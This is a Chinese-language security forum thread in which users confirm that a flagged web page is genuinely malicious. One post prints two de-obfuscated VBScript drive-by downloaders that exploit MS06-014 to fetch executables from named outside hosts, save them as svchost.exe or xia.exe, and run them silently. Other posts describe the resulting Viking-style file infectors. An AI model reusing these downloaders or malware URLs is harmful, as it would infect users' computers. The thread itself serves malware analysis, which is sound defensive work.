应该不是误杀..

偶兄弟们 在还原代码 稍等..

我也去看了,源码绝对有问题,不是误杀.等M版来还原吧: )

真实的网站是hXXp://3w.ycdy.com/cfad/0002.htm，但这个本身没问题，跳到hXXp://3w.ycdy.com/cfad/0001.htm

再由hXXp://3w.ycdy.com/cfad/0001.htm继续跳

偶是被气死了。。。一个无聊的 JS浪费偶N多时间

饶了大圈回到原来的网页，http://www1.ycdy.com/demo/mm.htm这个
<script language="VBScript">

on error resume next

MircoLong = "http://www1.ycdy.com/demo/cha0.exe"

    m4="down"
    m5="file"
    m6="copy"
    m7="exit"
    Set MircoLongc = document.createElement("object")
    MircoLongc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    seturla=m4
    seturlb=m5
    seturlc=m6
    seturld=m7
    MircoLongi="Microsoft.XMLHTTP"
    Set MircoLongd = MircoLongc.CreateObject(MircoLongi,"")
    seturlf="Ado"
    seturlg="db."
    seturlh="Str"
    seturli="eam"
    MircoLongf=seturlf&seturlg&seturlh&seturli
    MircoLongg=MircoLongf
    set MircoLonga = MircoLongc.createobject(MircoLongg,"")
    MircoLonga.type = 1
    MircoLongh="GET"
    MircoLongd.Open MircoLongh, MircoLong, False
    MircoLongd.Send
    MircoLong9="svchost.exe"
    set MircoLongb = MircoLongc.createobject("Scripting.FileSystemObject","")
    set MircoLonge = MircoLongb.GetSpecialFolder(2)
    MircoLonga.open
    MircoLong8="MircoLonga.BuildPath(MircoLonga,MircoLong8)"
    MircoLong7="MircoLongb.BuildPath(MircoLongb,MircoLong7)"
    MircoLong6="MircoLongc.BuildPath(MircoLongd,MircoLong6)"
    MircoLong5="MircoLongd.BuildPath(MircoLongf,MircoLong5)"
    MircoLong4="MircoLonge.BuildPath(MircoLongg,MircoLong4)"
    MircoLong3="MircoLongf.BuildPath(MircoLongh,MircoLong4)"
    MircoLong2="MircoLongg.BuildPath(MircoLongi,MircoLong3)"
    MircoLong1="MircoLongh.BuildPath(MircoLongg,MircoLong1)"
    MircoLong0="MircoLongi.BuildPath(MircoLongk,MircoLong0)"
    MircoLong9= MircoLongb.BuildPath(MircoLonge,MircoLong9)
    MircoLonga.write MircoLongd.responseBody
    MircoLonga.savetofile MircoLong9,2
    MircoLonga.close
    set MircoLonge = MircoLongc.createobject("Shell.Application","")
    MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0


</script>



第二个，http://60.190.222.233/wm/ip2.htm解密后

<html>
<script language="VBScript">
on error resume next
MyQQ5372453="http://60.190.222.233/wm/xia.exe"
Set CAOc = document.createElement("object")
c1 ="clsid:BD"
c2="96C556-65A3-11"
c3="D0-983A-00C04F"
c4="C29E36"
CAOc.setAttribute "classid",c1+c2+c3+c4
seturla="down"
seturlb="file"
seturlc="copy"
seturld="exit"
seturle="base"
CAOi="Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")
seturlf="Ado"
seturlg="db."
seturlh="Str"
seturli="eam"
CAOf=seturlf&seturlg&seturlh&seturli
CAOg=CAOf
set CAOa = CAOc.createobject(CAOg,"")
CAOa.type = 1
CAOh="GET"
CAOd.Open CAOh, MyQQ5372453, False
CAOd.Send
CAO9="xia.exe"
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")
set CAOe = CAOb.GetSpecialFolder(2)
CAOa.open
CAO8="CAOa.BuildPath(CAOa,CAO8)"
CAO7="CAOb.BuildPath(CAOb,CAO7)"
CAO6="CAOc.BuildPath(CAOd,CAO6)"
CAO5="CAOd.BuildPath(CAOf,CAO5)"
CAO4="CAOe.BuildPath(CAOg,CAO4)"
CAO3="CAOf.BuildPath(CAOh,CAO4)"
CAO2="CAOg.BuildPath(CAOi,CAO3)"
CAO1="CAOh.BuildPath(CAOg,CAO1)"
CAO0="CAOi.BuildPath(CAOk,CAO0)"
CAO9= CAOb.BuildPath(CAOe,CAO9)
CAOa.write CAOd.responseBody
CAOa.savetofile CAO9,2
CAOa.close
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open", 0
</script>
</html>


M，哪会干这么辛苦的活呢，这种苦事嘛，就交偶来了，希望他多多测试病毒，哈哈偶的表达能力不行，写不了分析

绝对不是误杀，看看这2个代码就知道了，第一个下载http://www1.ycdy.com/demo/cha0.exe，第二个下载http://60.190.222.233/wm/xia.exe，以上2个都是利用MS06-14漏洞。。。。只要打了补丁就不会中。。具体的偶下载来看看

下来运行了下，第一个http://www1.ycdy.com/demo/cha0.exe
生成威金LOGO1_.EXE等一大堆东西，感染所有exe文件，变成***.exe.Exe

第二个http://60.190.222.233/wm/xia.exe产生C:\WINDOWS\uninstall\rundl132.exe,C:\WINDOWS\RichDll.dll,也像是威金

有连网，怀疑是DL。。。好多一堆东西

楼主不在的说。。。晕死。。就算复习了